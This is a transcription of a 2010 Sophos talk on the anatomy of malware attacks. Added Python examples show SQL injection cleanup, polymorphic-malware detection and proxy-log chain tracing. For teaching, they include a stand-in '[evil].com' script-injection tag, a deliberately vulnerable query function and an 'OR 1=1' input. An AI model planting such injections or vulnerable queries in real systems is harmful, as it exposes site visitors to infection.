Anatomy of attack – the way of malware. Vanja Svajcer, Principal Researcher – Sophos. Zagreb, 12 May 2010. What do SophosLabs do? Collect threats; analyze and classify; create detection and cleanup; publish updates and information; R & D; more details later. SophosLabs at the core.
Anatomy of attack – the way of malware
Vanja Svajcer, Principal Researcher – Sophos
Zagreb, 12 May 2010
What do SophosLabs do?
• Collect threats
• Analyze and classify
• Create detection and cleanup
• Publish updates and information
• R & D
• More details later
Anatomy of attack
• Setting the scene
• Malware
• Attack techniques
• Analysis process & tools
• Protection technology
Malware types
• Virus
• Trojan
• Worm
Who used to write viruses?
No “standard” virus writer, no “standard” motivation.
• Schoolkids
• Undergraduates
• Post-graduates
• IT professionals
• Generally blokes, but not A/V companies
Who writes malware today?
• Rarely see viruses, but they are making a comeback
• It is about money
• It is criminal in its origins (there are still some spotty teenagers out there…)
APT
• Advanced Persistent Threat
• Fashionable term for “targeted malware”
• Small size (around 100k) and specialised
• No packing
• Looks like a legitimate Windows file
• Data exfiltration
• Difficult to remove
Email threats
• The latter half of 2008 saw a dramatic rise in email attachment malware
• 2009 has seen this trend continue, with several families being aggressively mass-spammed
• Same old social engineering tactics
• UPS/FedEx failed delivery reports, Microsoft patches, airline e-tickets, etc.
Top spammed malware (2009)
• Dominated by key malware families: Bredo, Waled
• Simple but still working!
Social Engineering – Bredo (Mal/Bredo)
• Same campaign may involve numerous “different” attachments
Social Engineering – Zbot (aka Zeus) (Mal/Zbot)
Bredo vs Zbot
• Competition between the bots!!!
• Bredo attempting to disable any installed Zbot
• Reminiscent of the Netsky vs Bagle wars from years ago!!!
Email threats
• Global spam traps to track spam
• USA relays more spam than any other single country
• Compromised computers not only spread spam, but distribute malware and launch DDoS attacks
Web predominant
• 99% of infected systems are legitimate, compromised sites
• Attack sites
• Botnet C&C using HTTP
• Attacks still often begin with a spammed-out email
Step 1: Redirect from compromised sites
Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload
SQL injection
[diagram: malicious SQL injection against several back-end databases]
• Hacker uses a tool to identify pages potentially vulnerable to SQL injection
• Sends malicious HTTP request (Demo)
SQL injection
[diagram: database records filled with repeated `<script src=http://[evil].com/file.js` tags]
• SQL injection causes databases to become peppered with malicious script tags
• Result is that pages on the web server built from data retrieved from the database also contain malicious script tags
SQL injection
• User browses site
• Malicious script tag silently loads script from remote server
• Victim is infected with malware: Asprox trojan
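The two sides of the SQL injection slides above, as an added example that is not part of the talk or of any Sophos tool: the string-spliced query that lets request input change the SQL, the parameterised query that does not, and a scan over stored text columns that finds the injected `<script src=...>` tags so the affected rows can be cleaned and the script host blocked. The `news` table, its rows and the `[evil].com` placeholder host are constructed for the example.

```python
import html
import re
import sqlite3

# Constructed sample data (not from the talk): a small "news" table as it
# might look after the injection above has stored a script tag in text
# columns. The hostname is the placeholder used on the slide, not a real site.
INJECTED_TAG = '<script src=http://[evil].com/file.js></script>'
SAMPLE_ROWS = [
    (1, "Opening hours", "We are open 9 to 5."),
    (2, "Contact", "Call the front desk." + INJECTED_TAG),
    (3, "About", "Founded in 1999." + INJECTED_TAG + INJECTED_TAG),
]

# Matches a <script> tag carrying a src attribute and captures the URL.
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^\s'\">]+)", re.I)


def build_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, news_id):
    """The defect: request input is spliced into the SQL text, so the input
    can change the query instead of merely supplying a value."""
    sql = "SELECT id, title FROM news WHERE id = " + str(news_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, news_id):
    """The fix: a bound parameter is always treated as a value, never as SQL."""
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def find_injected_scripts(conn, table, columns):
    """Scan the given text columns for <script src=...> tags.

    `table` and `columns` are trusted names chosen by the operator, not
    request input. Returns [(row id, column, script URL), ...] so the
    affected rows can be cleaned and the script host blocked.
    """
    hits = []
    for col in columns:
        for row_id, value in conn.execute(f"SELECT id, {col} FROM {table}"):
            for match in SCRIPT_SRC.finditer(value or ""):
                hits.append((row_id, col, match.group(1)))
    return hits


def render_body(value):
    """Output encoding: stored text reaches the page as text, so an injected
    tag is displayed literally instead of being executed by the browser."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    db = build_db()
    print("safe lookup:", safe_lookup(db, 1))
    print("vulnerable lookup:", vulnerable_lookup(db, "1 OR 1=1"))
    for hit in find_injected_scripts(db, "news", ["title", "body"]):
        print("injected script:", hit)
```

The scan is the cleanup aid, not the fix: rows found by `find_injected_scripts` have to be restored from a known-good backup, and the query that admitted the payload has to be parameterised, or the tags come straight back on the next request.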
Step 2: Further redirects
Compromised web sites → Attacker-controlled redirects → Payload
SEO poisoning
• Search for popular keywords
Step 3: Load content from the attack site
Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload
Web Attacks
• Built using purchased kit: MPack, IcePack, GPack, Neosploit, Eleonore, Yes
• Management console
• Phishing
• Discovered: Oct 19th 2009
• Country hit rate: France – 4%, US – 17%, GB – 3%, Germany – 6%
Web Attacks
• Per-browser breakdown!
• Server-side polymorphism
• Hit rate: MSIE – 12%, Firefox – 1%, Opera – 5%
Polymorphic malware weakness
• Poly engine is part of the code
• Can be reversed by persistent researchers
• Must be decrypted in memory
• Emulate the code until the invariant is found
• Detection can be based on the decryption loop
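The two detection approaches on this slide, as an added example that is not from the talk or from any Sophos product: a constructed toy "polymorphic engine" produces samples whose bytes differ (random key, XOR or ADD scheme, junk padding), a tiny emulator runs each sample's decryption stub until the body is back in memory and the invariant text shows up, and a second detector matches the shape of the decryption loop while ignoring the junk. The instruction set, the `INVARIANT` string and the samples are all constructed for the example and resemble no real malware format.

```python
import random
import re

# Toy instruction set for the constructed samples (not a real malware format).
# A sample is a decryption stub followed by the encrypted body.
#   XOR_LOOP key start len : for i in range(len): mem[start+i] ^= key
#   ADD_LOOP key start len : for i in range(len): mem[start+i] = (mem[start+i] + key) & 0xFF
#   NOP                    : junk the engine sprinkles in to vary the stub bytes
#   END                    : stub finished
XOR_LOOP, ADD_LOOP, NOP, END = 0x01, 0x02, 0x90, 0xFF

# The invariant: text that every variant contains once its body is decrypted.
INVARIANT = b"HELLO-FROM-PAYLOAD"


def make_variant(body, rng):
    """Constructed toy polymorphic engine: new key, random scheme, random junk.
    The bytes on disk differ per variant; the decrypted body never does."""
    assert len(body) < 256, "toy format uses one-byte operands"
    key = rng.randrange(1, 256)
    op = rng.choice([XOR_LOOP, ADD_LOOP])
    junk_before = bytes([NOP]) * rng.randrange(0, 6)
    junk_after = bytes([NOP]) * rng.randrange(0, 6)
    # The loop needs the body's offset, which depends on the stub length.
    stub_len = len(junk_before) + 4 + len(junk_after) + 1
    loop = bytes([op, key, stub_len, len(body)])
    if op == XOR_LOOP:
        enc = bytes(b ^ key for b in body)
    else:
        enc = bytes((b - key) & 0xFF for b in body)  # ADD_LOOP restores it
    return junk_before + loop + junk_after + bytes([END]) + enc


def emulate(sample, max_steps=10_000):
    """Run the stub in a tiny interpreter and return memory afterwards.
    The step budget is what stops a hostile or broken stub running forever."""
    mem = bytearray(sample)
    pc = steps = 0
    while pc < len(mem) and steps < max_steps:
        op = mem[pc]
        steps += 1
        if op == NOP:
            pc += 1
        elif op in (XOR_LOOP, ADD_LOOP) and pc + 3 < len(mem):
            key, start, length = mem[pc + 1], mem[pc + 2], mem[pc + 3]
            for i in range(start, min(start + length, len(mem))):
                steps += 1
                if op == XOR_LOOP:
                    mem[i] ^= key
                else:
                    mem[i] = (mem[i] + key) & 0xFF
            pc += 4
        else:
            break  # END, or an opcode the emulator does not know: stop here
    return bytes(mem)


def detect_by_invariant(sample):
    """Emulate the decryption, then look for the invariant in memory."""
    return INVARIANT in emulate(sample)


# Detection based on the decryption loop itself: one loop opcode with three
# operands, surrounded by any amount of junk, terminated by END.
LOOP_SHAPE = re.compile(rb"\A\x90*[\x01\x02].{3}\x90*\xff", re.DOTALL)


def detect_by_loop(sample):
    """Match the stub's shape, ignoring the junk that varies between variants."""
    return LOOP_SHAPE.match(sample) is not None


if __name__ == "__main__":
    rng = random.Random(2010)
    body = b"junk-" + INVARIANT + b"-more"
    for n in range(3):
        v = make_variant(body, rng)
        print(n, v[:12].hex(), "plain invariant:", INVARIANT in v,
              "emulated:", detect_by_invariant(v), "loop:", detect_by_loop(v))
```

The invariant check is the more robust of the two because it does not care how the stub is written, only what it leaves in memory; its cost is the emulation, which is why the step budget matters. The loop-shape check is cheap and catches every variant this engine can produce, but breaks as soon as the engine gains a new opcode, which is the usual arms race between a polymorphic engine and the detection written for it.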
Step 4: Hit the victim with exploits, infect them.
Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload
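The four steps above seen from the defender's side, as an added example that is not part of the talk: a reconstruction of the compromised site → redirector → attack site → payload chain from a web proxy log. The log lines, their field layout, the hostnames and the two-second redirect window are all constructed for the example; the linking rules are heuristics and are labelled as such in the code.

```python
from datetime import datetime
from urllib.parse import urlparse

# Constructed proxy log (not from the talk). Fields: time client method url
# status content-type referer ("-" when absent). Hostnames are placeholders.
PROXY_LOG = """\
2010-05-12T10:00:01 10.0.0.5 GET http://news.example.com/article?id=7 200 text/html -
2010-05-12T10:00:02 10.0.0.5 GET http://static.example.com/site.js 200 text/javascript http://news.example.com/article?id=7
2010-05-12T10:00:02 10.0.0.5 GET http://go.example.org/in.cgi?3 302 - http://news.example.com/article?id=7
2010-05-12T10:00:03 10.0.0.5 GET http://kit.example.biz/index.php 200 text/html http://news.example.com/article?id=7
2010-05-12T10:00:04 10.0.0.5 GET http://kit.example.biz/load.php?e=1 200 application/x-msdownload http://kit.example.biz/index.php
2010-05-12T10:05:00 10.0.0.9 GET http://news.example.com/article?id=8 200 text/html -
2010-05-12T10:05:01 10.0.0.9 GET http://news.example.com/style.css 200 text/css http://news.example.com/article?id=8
"""

EXECUTABLE_TYPES = {"application/x-msdownload", "application/octet-stream"}
REDIRECT_WINDOW_S = 2  # assumption: a followed redirect is requested within 2 s


def parse_log(text):
    """Parse the constructed log format into dicts, ordered by time."""
    rows = []
    for line in text.splitlines():
        ts, client, method, url, status, ctype, referer = line.split()
        rows.append({
            "time": datetime.fromisoformat(ts), "client": client, "method": method,
            "url": url, "status": int(status), "ctype": ctype,
            "referer": None if referer == "-" else referer, "parent": None,
        })
    rows.sort(key=lambda r: r["time"])  # stable: same-second rows keep log order
    return rows


def link_parents(rows):
    """Give each request the index of the request that led to it.

    Two rules, both heuristics: (1) a request that follows a 302 from the same
    client, within the window and with the same referer, is the redirect being
    followed; (2) otherwise the parent is the most recent request for the URL
    named in the Referer header. Browsers keep the original referer when they
    follow a redirect, which is why rule 1 is needed at all.
    """
    last_by_client = {}
    for i, row in enumerate(rows):
        prev = last_by_client.get(row["client"])
        if (prev is not None and rows[prev]["status"] == 302
                and rows[prev]["referer"] == row["referer"]
                and (row["time"] - rows[prev]["time"]).total_seconds() <= REDIRECT_WINDOW_S):
            row["parent"] = prev
        elif row["referer"]:
            for j in range(i - 1, -1, -1):
                if rows[j]["client"] == row["client"] and rows[j]["url"] == row["referer"]:
                    row["parent"] = j
                    break
        last_by_client[row["client"]] = i
    return rows


def suspicious_chains(rows, min_hosts=2):
    """Walk back from every executable download and report the chains that
    crossed at least `min_hosts` distinct hosts (page -> redirector -> attack site)."""
    link_parents(rows)
    chains = []
    for i, row in enumerate(rows):
        if row["ctype"] not in EXECUTABLE_TYPES:
            continue
        chain, cur = [], i
        while cur is not None:
            chain.append(rows[cur]["url"])
            cur = rows[cur]["parent"]
        chain.reverse()
        if len({urlparse(u).hostname for u in chain}) >= min_hosts:
            chains.append(chain)
    return chains


if __name__ == "__main__":
    for chain in suspicious_chains(parse_log(PROXY_LOG)):
        print(" -> ".join(chain))
```

The first URL in each reported chain is the compromised legitimate site from Step 1, which is what the site owner needs to be told; the hosts in the middle are the redirector and attack site from Steps 2 and 3, which are the ones worth blocking at the proxy. Referer-based linking is only as good as the browser's Referer header, so a chain with a missing parent should be read as "unknown origin", not as "no origin".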
Zeus (Zbot)
• Information-stealing malware and botnet-building kit
• Builder
• Loader
• Control panel